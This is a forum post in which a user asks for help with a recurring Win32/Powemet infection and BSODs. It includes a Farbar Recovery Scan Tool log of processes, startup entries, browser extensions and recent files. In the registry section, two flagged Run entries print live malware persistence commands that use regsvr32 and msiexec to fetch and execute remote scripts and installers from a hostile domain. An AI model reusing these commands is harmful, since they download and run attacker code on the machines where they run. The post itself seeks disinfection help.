Win32/Powemet.B!attk infection causing BSOD


8 replies to this topic

#1 Doxxy

Doxxy

  • Members
  • 4 posts
  • OFFLINE
  • Local time:08:05 PM

Posted 02 September 2017 - 09:16 PM

Good evening,

 

Several days ago, Windows Security Essentials noticed this infection on my computer that, after being removed with the antivirus software, persists with every subsequent reboot. Yesterday, I attempted to remove it using the method outlined in the following link, but it was not successful (https://answers.microsoft.com/en-us/protect/forum/protect_defender-protect_scanning/malware-behaviorwin32powemetbattk/c97ad8e1-7554-4aaa-8238-55517108d56c?auth=1). During this process, a forum member mentioned BleepingComputer, so I have come here for assistance.

 

The only symptom I am noticing (besides the antivirus notifications) is a very occasional BSOD.

 

FRST Log:  

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-08-2017
Ran by XYZ (administrator) on XYZ-PC (02-09-2017 22:08:09)
Running from C:\Users\XYZ\Desktop
Loaded Profiles: XYZ & UpdatusUser (Available Profiles: XYZ & UpdatusUser)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\D-Link\DWA-160\ANIWConnService.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Valve Corporation) E:\Program Files\Steam\Steam.exe
(Flux Software LLC) C:\Users\XYZ\AppData\Local\FluxSoftware\Flux\flux.exe
(SteelSeries ApS) E:\Program Files\SteelSeries Engine\SteelSeriesEngine.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Razer Inc.) C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe
(DEVGURU Co., LTD.) E:\Program Files\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe
(Dropbox, Inc.) C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-160\AirNCFG.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Dropbox, Inc.) C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Dropbox, Inc.) C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Apple Inc.) E:\Program Files\iTunes\iTunesHelper.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Logitech Inc.) E:\Program Files (x86)\Logitech Webcam\LWS\Webcam Software\LWS.exe
(MagicISO, Inc.) E:\Program Files\MagicDisc\MagicDisc.exe
(Futuredial Inc.) E:\Program Files (x86)\Asus Sync\asusUPCTLoader.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Samsung Electronics Co., Ltd.) E:\Program Files\Kies\KiesTrayAgent.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusionHookAppWIN6032.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusionHookAppWIN6064.exe
(Valve Corporation) E:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) E:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM-x32\...\Run: [D-Link D-Link Wireless N Dual Band DWA-160 ] => C:\Program Files (x86)\D-Link\DWA-160\AirNCFG.exe [1078592 2011-11-02] (D-Link Corp.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-05-21] (Intel Corporation)
HKLM-x32\...\Run: [iTunesHelper] => E:\Program Files\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [LWS] => E:\Program Files (x86)\Logitech Webcam\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [RzWizard] => C:\Program Files (x86)\Razer\RzWizard\RzWizard.exe [254976 2015-07-23] (Razer Inc.)
HKLM-x32\...\Run: [ASUS Sync Loader] => E:\Program Files (x86)\Asus Sync\asusUPCTLoader.exe [638976 2012-04-20] (Futuredial Inc.)
HKLM-x32\...\Run: [KiesTrayAgent] => E:\Program Files\Kies\KiesTrayAgent.exe [318248 2016-01-08] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Steam] => E:\Program Files\Steam\steam.exe [3071776 2017-08-28] (Valve Corporation)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [f.lux] => C:\Users\XYZ\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [SteelSeries Engine] => E:\Program Files\SteelSeries Engine\SteelSeriesEngine.exe [242688 2013-11-05] (SteelSeries ApS)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Dropbox Update] => C:\Users\XYZ\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [DisplayFusion] => C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe [9161720 2016-12-23] (Binary Fortress Software)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Spotify] => C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe [15866480 2017-08-03] (Spotify Ltd)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Spotify Web Helper] => C:\Users\XYZ\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1580144 2017-08-03] (Spotify Ltd)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\MountPoints2: F - F:\autorun.exe
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\MountPoints2: {3ab623ce-a82c-11e4-a6ad-60a44c624579} - F:\autorun.exe
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\MountPoints2: {9abf95ad-0c65-11e3-9c98-806e6f6e6963} - D:\autorun.exe
ShellExecuteHooks: Directory Opus Shell Execute Hook - {3CF9ECE0-1A9F-11D2-8C73-00C06C2005DE} - C:\Program Files\GPSoftware\Directory Opus\dopuslib.dll [1809776 2017-03-21] (GP Software)
ShellExecuteHooks-x32: Directory Opus Shell Execute Hook - {EE761688-C137-4b04-8FAB-3C9CDF0886F0} - C:\Program Files\GPSoftware\Directory Opus\dopuslib32.dll [381296 2017-03-20] (GP Software)
Startup: C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-23]
ShortcutTarget: Dropbox.lnk -> C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MagicDisc.lnk [2013-09-11]
ShortcutTarget: MagicDisc.lnk -> E:\Program Files\MagicDisc\MagicDisc.exe (MagicISO, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SteelSeries Engine 3.lnk [2014-09-15]
ShortcutTarget: SteelSeries Engine 3.lnk -> C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d95afb5c-9892-41c9-a72b-9151909f8cef} <==== ATTENTION (Restriction - IP)
Tcpip\Parameters: [DhcpNameServer] 216.104.96.22 216.104.98.222
Tcpip\..\Interfaces\{4BDC28DD-5486-429A-8BD5-7EE7F535A427}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4FB55C4F-470C-4ACC-AE28-7D97B6EC0BA5}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{FE7A27F3-EA0A-4F7A-84BE-9DB5984BB7B3}: [DhcpNameServer] 216.104.96.22 216.104.98.222
 
Internet Explorer:
==================
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> E:\Program Files\Java\jre1.8.0_101\bin\ssv.dll [2016-08-11] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> E:\Program Files\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-11] (Oracle Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-03-20] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-03-20] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: nxtbh2df.default
FF ProfilePath: C:\Users\XYZ\AppData\Roaming\Mozilla\Firefox\Profiles\nxtbh2df.default [2017-09-01]
FF Extension: (Site Deployment Checker) - C:\Users\XYZ\AppData\Roaming\Mozilla\Firefox\Profiles\nxtbh2df.default\features\{11da577c-36a6-4fb7-87ea-c439e9e69f3d}\deployment-checker@mozilla.org.xpi [2017-04-01]
FF Plugin: @java.com/DTPlugin,version=11.101.2 -> E:\Program Files\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.101.2 -> E:\Program Files\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-11] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-03-20] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-03-20] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-04-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-04-29] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.6\npGoogleUpdate3.dll [2017-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.6\npGoogleUpdate3.dll [2017-07-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> E:\Program Files\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> E:\Program Files\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-08-10] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1331985295-2685822398-3683760129-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\XYZ\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-10-03] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1331985295-2685822398-3683760129-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2016-08-24] ()
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR StartupUrls: Default -> "hxxp://google.ca/","hxxps://webmail.snolab.ca/","hxxps://www.snolab.ca/shift/TWiki/bin/login/Main/WebHome?origurl=/shift/TWiki/bin/view","hxxps://www.snolab.ca/docushare/dsweb/HomePage","hxxps://hr.snolab.ca/selfservice/","hxxps://procurement.snolab.ca/ReQlogic/Login.aspx"
CHR NewTab: Default ->  Not-active:"chrome-extension://laookkfknpbbblfpciffpaejjkokdgca/dashboard.html"
CHR DefaultSearchKeyword: Default -> lp
CHR Profile: C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default [2017-09-02]
CHR Extension: (Google Docs) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-03]
CHR Extension: (Google Drive) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-20]
CHR Extension: (YouTube) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Cast) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2017-01-25]
CHR Extension: (uBlock Origin) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-07-21]
CHR Extension: (Google Search) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Adobe Acrobat) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-06-08]
CHR Extension: (Google Docs Offline) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-17]
CHR Extension: (Hover Free) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcmnnggnaofmhflgomfjfbndngdoogkj [2013-08-23]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-08-30]
CHR Extension: (Lone Tree) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\hfmkllfplegemejikoabfpjdaoncphip [2017-09-01]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2017-07-30]
CHR Extension: (Momentum) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\laookkfknpbbblfpciffpaejjkokdgca [2017-08-25]
CHR Extension: (Google Dictionary (by Google)) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgijmajocgfcbeboacabfgobmjgjcoja [2017-07-23]
CHR Extension: (Google Mail Checker) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihcahmgecmbnbcchbopgniflfhgnkff [2013-08-23]
CHR Extension: (Ghostery) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlomiejdfkolichcflejclcbmpeaniij [2017-08-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (uMatrix) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\ogfcmafjalglgifnmanfmnieipoejdcf [2017-04-10]
CHR Extension: (Gmail) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR Extension: (Chrome Media Router) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-08]
CHR HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 D-Link Wireless N Dual Band DWA-160 _WPS; C:\Program Files (x86)\D-Link\DWA-160\ANIWConnService.exe [53248 2010-07-12] () [File not signed]
S3 DAUpdaterSvc; E:\Program Files\Steam\steamapps\common\Dragon Age Origins\bin_ship\DAUpdaterSvc.Service.exe [25832 2015-04-17] (BioWare)
R2 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [5098008 2016-12-23] (Binary Fortress Software)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-06-25] (Intel Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2016-08-24] ()
R2 RzWizardService; C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe [368128 2015-07-23] (Razer Inc.) [File not signed]
R2 ss_conn_service; E:\Program Files\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (DEVGURU Co., LTD.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2010-05-29] ()
R1 epp; C:\EEK\bin64\epp.sys [124552 2016-11-23] (Emsisoft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R1 MpKsl2b58743b; C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{F3220B1B-A48A-42F1-94A9-12E136886E9E}\MpKsl2b58743b.sys [44928 2017-09-02] (Microsoft Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1660480 2011-09-09] (Ralink Technology Corp.)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 RTL8192cu; C:\Windows\System32\DRIVERS\RTL8192cu.sys [926824 2013-03-12] (Realtek Semiconductor Corporation )
S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52592 2016-02-17] (Cisco Systems, Inc.)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-01 22:23 - 2017-09-01 22:23 - 000000000 ____D C:\Users\XYZ\AppData\Local\ESET
2017-09-01 18:50 - 2017-09-01 18:50 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\3909
2017-09-01 18:50 - 2017-09-01 18:50 - 000000000 ____D C:\ProgramData\Emsisoft
2017-09-01 18:47 - 2017-09-02 00:34 - 000000000 ____D C:\EEK
2017-09-01 18:45 - 2017-09-01 18:48 - 000000000 ____D C:\AdwCleaner
2017-09-01 18:44 - 2017-09-01 18:44 - 000002458 _____ C:\Users\XYZ\Desktop\JRT.txt
2017-09-01 18:42 - 2017-09-01 18:42 - 000001938 _____ C:\Users\XYZ\Desktop\Rkill.txt
2017-09-01 18:22 - 2017-09-01 18:22 - 000003168 _____ C:\Users\XYZ\Desktop\Search.txt
2017-09-01 18:12 - 2017-09-01 18:13 - 000029785 _____ C:\Users\XYZ\Desktop\fixlist.txt
2017-09-01 18:10 - 2017-09-02 22:08 - 000022498 _____ C:\Users\XYZ\Desktop\FRST.txt
2017-09-01 18:10 - 2017-09-01 18:13 - 000113837 _____ C:\Users\XYZ\Desktop\Addition.txt
2017-09-01 18:10 - 2017-09-01 17:49 - 002395648 _____ (Farbar) C:\Users\XYZ\Desktop\FRST64.exe
2017-09-01 17:50 - 2017-09-02 22:08 - 000000000 ____D C:\FRST
2017-08-23 20:40 - 2017-08-23 20:40 - 000001158 _____ C:\Users\XYZ\Desktop\Fallout 4 (F4SE).lnk
2017-08-23 17:06 - 2017-08-23 17:06 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-21 16:33 - 2017-08-23 18:53 - 000000502 _____ C:\Users\XYZ\Desktop\FO4 mod progress.txt
2017-08-21 16:03 - 2017-08-21 16:03 - 000000980 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LOOT.lnk
2017-08-21 16:03 - 2017-08-21 16:03 - 000000000 ____D C:\Program Files (x86)\LOOT
2017-08-21 15:40 - 2017-08-21 15:40 - 000000000 ____D C:\Users\XYZ\AppData\Local\Bilago
2017-08-21 15:20 - 2017-08-21 15:20 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\F4SE
2017-08-17 16:35 - 2017-08-17 16:35 - 000083573 _____ C:\Users\XYZ\Desktop\JK-TK.pdf
2017-08-16 22:11 - 2017-08-16 22:11 - 000000773 _____ C:\Users\Public\Desktop\Nexus Mod Manager.lnk
2017-08-16 22:11 - 2017-08-16 22:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager
2017-08-03 15:50 - 2017-09-02 20:35 - 000003010 _____ C:\Windows\System32\Tasks\MSIAfterburner
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-02 22:05 - 2014-12-31 16:54 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Spotify
2017-09-02 21:38 - 2015-06-18 22:11 - 000000918 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1331985295-2685822398-3683760129-1000UA.job
2017-09-02 20:42 - 2009-07-14 00:45 - 000029120 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-09-02 20:42 - 2009-07-14 00:45 - 000029120 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-09-02 20:40 - 2009-07-14 01:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2017-09-02 20:40 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\inf
2017-09-02 20:35 - 2016-11-05 09:00 - 000000000 ____D C:\Users\XYZ\AppData\Local\CrashDumps
2017-09-02 20:35 - 2014-12-31 16:54 - 000000000 ____D C:\Users\XYZ\AppData\Local\Spotify
2017-09-02 20:34 - 2013-08-27 12:15 - 000000000 ____D C:\ProgramData\NVIDIA
2017-09-02 20:34 - 2009-07-14 01:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
